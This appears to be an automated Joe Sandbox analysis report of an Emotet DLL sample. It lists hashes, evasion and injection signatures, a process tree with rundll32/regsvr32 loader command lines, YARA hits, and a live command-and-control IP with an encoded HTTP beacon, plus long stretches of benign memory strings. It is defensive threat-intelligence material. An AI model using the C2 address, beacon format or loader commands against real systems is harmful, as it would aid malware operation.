Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1Klocu2k7B

Overview

General Information

Sample Name:1Klocu2k7B (renamed file extension from none to dll)
Analysis ID:626501
MD5:ce75ec6dff9fca7fd1c20269811e7cd6
SHA1:dce479a4927227ba78dd6bd876b60abc7c0b5acd
SHA256:cb5d6edc7f65880cb51cd99d81dffa44dc801150bd4c27cf01749a305c26285b
Tags:exetrojan
Infos:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 4800 cmdline: loaddll64.exe "C:\Users\user\Desktop\1Klocu2k7B.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 400 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 3280 cmdline: rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 5276 cmdline: regsvr32.exe /s C:\Users\user\Desktop\1Klocu2k7B.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 1864 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 5104 cmdline: rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 992 cmdline: rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 4800 cmdline: C:\Windows\system32\WerFault.exe -u -p 992 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 4576 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2400 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6104 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3700 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1972 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2508 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7144 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6856 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.298205207.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000007.00000002.808360106.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.329868359.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.808194532.0000000002490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.298619833.000001FDEC700000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.1e219be0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.0.rundll32.exe.1f1cbe10000.4.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                7.2.regsvr32.exe.2490000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  6.0.rundll32.exe.1f1cbe10000.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.1e219be0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 9 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 1Klocu2k7B.dllVirustotal: Detection: 31%Perma Link
                      Source: https://23.239.0.12/&Avira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: 1Klocu2k7B.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: rundll32.exe, 00000006.00000000.303936013.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.329633207.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.807116513.0000000000A75000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: rundll32.exe, 00000006.00000000.303936013.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.329633207.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.807116513.0000000000A75000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: xuG=xWaVIxmlebPbaJHEIrQ0fbxnFEn0sAEIgsR7w9CORqGcUqZA2KwjTd6krDnDc9qkAviibKLZfZRfbo7cmq/KNi4xlyyeQT/8Gu8lVgMPU7K3+hrHswvKNj2B24KCO5h/6sGu973IP8je50zJyXAsyjPYnfHQxjlHj0xvdafXFdGJFICGaLkLQ8Nz5i5OsAykpKaioQ8/NvfSOL+0fL6dpyaj0oeOBABb2y4wbF6z/zqO6lfB5AeRctJlQvM2mgX5D70Pz8DrXIY+RK1/9np5WQ==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 00000022.00000003.590099801.000001C02E971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000022.00000003.590099801.000001C02E971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000022.00000003.590099801.000001C02E971000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.589191637.000001C02E981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000022.00000003.590099801.000001C02E971000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.589191637.000001C02E981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000007.00000002.808046763.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368648431.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.672862492.000001CDC5489000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.808093665.0000023D988E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.631136553.000001C02E900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000E.00000002.672639318.000001CDC40D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.630957740.000001C02E0E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000E.00000003.671968132.000001CDC40BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.672618537.000001CDC40BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2
                      Source: svchost.exe, 0000000B.00000002.331180065.000001430AC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000007.00000002.807577949.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368846943.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000007.00000002.807577949.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368846943.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/&
                      Source: svchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331303065.000001430AC4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331303065.000001430AC4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000B.00000003.330635732.000001430AC68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331336940.000001430AC6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000002.331180065.000001430AC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331303065.000001430AC4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330844563.000001430AC41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331297688.000001430AC42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330844563.000001430AC41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331297688.000001430AC42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331324173.000001430AC5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.331324173.000001430AC5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
